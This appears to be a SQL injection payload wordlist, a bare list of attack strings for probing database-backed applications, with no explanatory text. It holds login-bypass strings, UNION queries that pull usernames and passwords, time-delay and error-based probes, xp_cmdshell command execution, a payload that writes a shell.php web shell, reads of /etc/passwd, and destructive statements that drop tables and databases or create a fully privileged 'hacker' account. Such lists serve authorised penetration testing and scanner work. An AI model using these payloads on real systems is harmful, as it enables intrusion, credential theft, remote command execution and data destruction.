'
''
`
``
,
"
""
/
//
\
\\
;
' or '1'='1
' or '1'='1'--
' or '1'='1'/*
' or 1=1--
' or 1=1#
' or 1=1/*
" or 1=1--
" or 1=1#
" or 1=1/*
') or ('1'='1
')) or (('1'='1
' OR 'x'='x
" OR "x"="x
' OR 1=1--
' OR 1=1#
' OR 1=1/*
) OR 1=1--
) OR 1=1#
)) OR 1=1--
1' or '1'='1
1" or "1"="1
1 or 1=1
1 OR 1=1--
1 OR 1=1#
1; SELECT 1
1'); SELECT 1--
1'; DROP TABLE users--
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1--
' UNION SELECT 1,2--
' UNION SELECT 1,2,3--
' UNION SELECT 1,2,3,4--
' UNION SELECT 1,2,3,4,5--
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL,NULL--
' UNION ALL SELECT NULL,NULL,NULL--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--
' UNION SELECT @@version--
' UNION SELECT @@hostname--
' UNION SELECT @@datadir--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT schema_name FROM information_schema.schemata--
' UNION SELECT 1,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--
' AND 1=1--
' AND 1=2--
' AND 1=1#
' AND 1=2#
' AND 'a'='a
' AND 'a'='b
" AND "a"="a
" AND "a"="b
' AND 1=1 LIMIT 1--
1' AND 1=1--
1' AND 1=2--
1" AND 1=1--
1" AND 1=2--
' AND SLEEP(5)--
' AND SLEEP(5)#
'; WAITFOR DELAY '0:0:5'--
'; WAITFOR DELAY '0:0:5'#
' AND BENCHMARK(5000000,MD5('x'))--
') AND SLEEP(5)--
")) AND SLEEP(5)--
') AND 1=1--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' OR SLEEP(5)--
' OR SLEEP(5)#
'; EXEC xp_cmdshell('whoami')--
'; EXEC xp_cmdshell('net user')--
'; EXEC master..xp_cmdshell('whoami')--
' ; SELECT * FROM users--
'/**/OR/**/1=1--
'%20or%201=1--
'%20or%201=1%23
%27%20or%201=1--
%27%20or%201=1%23
' OR 1=1 LIMIT 1 OFFSET 0--
' OR 1=1 ORDER BY 1--
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 4--
' ORDER BY 5--
' GROUP BY 1--
' GROUP BY 1,2--
' HAVING 1=1--
' HAVING 1=2--
' AND 1 IN (SELECT min(username) FROM users)--
' AND extractvalue(1,concat(0x7e,(SELECT version())))--
' AND updatexml(1,concat(0x7e,(SELECT version())),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND EXP(~(SELECT * from(SELECT version())a))--
' AND GTID_SUBSET(CONCAT(0x7e,(SELECT version()),0x7e),1)--
' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(database())) USING utf8)))--
' OR 1 GROUP BY CONCAT(version(),FLOOR(RAND(0)*2)) HAVING MIN(0)--
' AND 1=CONVERT(int,@@version)--
' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))--
declare @q nvarchar(4000);set @q=N'select @@version';exec(@q)--
exec('sel'+'ect 1')--
' OR (SELECT TOP 1 table_name FROM information_schema.tables)>'a'--
' OR substring(@@version,1,1)='5'--
' OR substring(@@version,1,1)='M'--
' OR MID(@@version,1,1)='5'--
' AND MID(version(),1,1)='5'--
' AND MID(version(),1,5)='5.7.2'--
' PROCEDURE ANALYSE(EXTRACTVALUE(1,CONCAT(0x3a,version())),1)--
' INTO OUTFILE '/var/www/html/shell.php'--
' LOAD_FILE('/etc/passwd')--
' LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE users--
1; INSERT INTO users(username,password) VALUES('hacker','hacked')--
1; UPDATE users SET password='hacked' WHERE username='admin'--
1; DELETE FROM users WHERE username='victim'--
1; DROP TABLE users--
1; DROP DATABASE target--
1; CREATE USER 'hacker'@'%' IDENTIFIED BY 'p4ssw0rd'--
1; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%'--
' OR 1=1 INTO OUTFILE '/tmp/test.txt'--
admin'--
admin' --
admin'/*
admin'#
admin' or '1'='1
admin' or 1=1--
admin' or 1=1#
') or 1=1--
')) or 1=1--
%00
\x00
\x27
\x22
\x27 OR 1=1
\x27\x20OR\x201=1
\x27\x20OR\x201=1--
\0x27
0x27
0x3c42523e  
0x2742524f
0x2720
